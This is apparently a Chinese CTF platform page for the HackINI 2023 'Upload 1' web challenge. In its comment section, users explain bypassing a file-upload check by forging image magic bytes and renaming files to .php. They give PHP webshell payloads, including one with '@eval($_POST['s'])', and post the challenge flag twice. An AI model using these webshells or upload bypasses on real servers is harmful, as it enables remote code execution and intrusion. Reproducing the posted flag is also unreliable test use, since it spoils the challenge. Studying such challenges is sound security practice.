Upload 1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: 18718578940
一血奖励: 0金币
解  决: 666
提  示:
描  述:
We added a verification. Bypass it. **Author**: souad
评论
妈!有人打我 1月前

改了文件后缀php,上传就会崩,服务有问题吧

回复 1

妈!有人打我 1月前

为啥我结尾加木马上传后,服务就崩了

回复 1

lunarbyside 3月前

不用上传图片吧,也不检测文件后缀,只检测文件头,在php文件里面写三个字符以上加上一句话木马,然后用010修改前三个字节为FF D8 FF就绕过了。

回复 1

ymkiras 6月前

这里可以用qq截图只截1的像素点就可以得到只有字节大小的图片,然后抓包png头不要动,更改文件名变成.php,然后改content-type,然后植入命令内容就跟第一题一样了,PNG头不要动,其他你随便怎么改,改了头大部分情况下就是不安全的

回复 0

MoCaser 6月前

看了wp和评论区,但还是失败了,要么是文件太大要么是图片码被检测出不安全

回复 0

admin9101 11月前

GIF89a <?php system('cat /flag.txt');?>

回复 0

北橘 12月前

shellmates{PoLyg10t_F1l3s_Byp4$S}

回复 0

007 1年前

shellmates{PoLyg10t_F1l3s_Byp4$S}}

回复 0

Garmin 1年前

上传个小图片,上传时用bp抓包加一句话木马再上传即可

回复 0

chouchou 1年前

编写一个php文件 GIF89a <?php echo "<pre>"; system('cat /flag.txt'); echo "</pre>"; #@eval($_POST['s']); ?> 先绕过对php的检查,然后再php中执行shell

回复 0

WriteUp

image
yangbo

2 金币

评分(1)

解题动态

orange2015 攻破了该题 10小时前
不上早八 攻破了该题 2天前
VIP784 攻破了该题 3天前
孙燕姿圈外男友 攻破了该题 3天前
ah990330230 攻破了该题 3天前
901548546 攻破了该题 4天前
34445230 攻破了该题 4天前
tdwj 攻破了该题 4天前
XiaoYeCM 攻破了该题 4天前
5032894 攻破了该题 5天前
88788 攻破了该题 5天前
daqindiguo 攻破了该题 7天前
tcqctf 攻破了该题 7天前
无敌霸王龙 攻破了该题 8天前
mhxiaobai 攻破了该题 8天前
NiceNorth 攻破了该题 8天前
theicer01 攻破了该题 11天前
17807032991 攻破了该题 11天前
zdevelop 攻破了该题 11天前
xiayanting 攻破了该题 12天前
问题反馈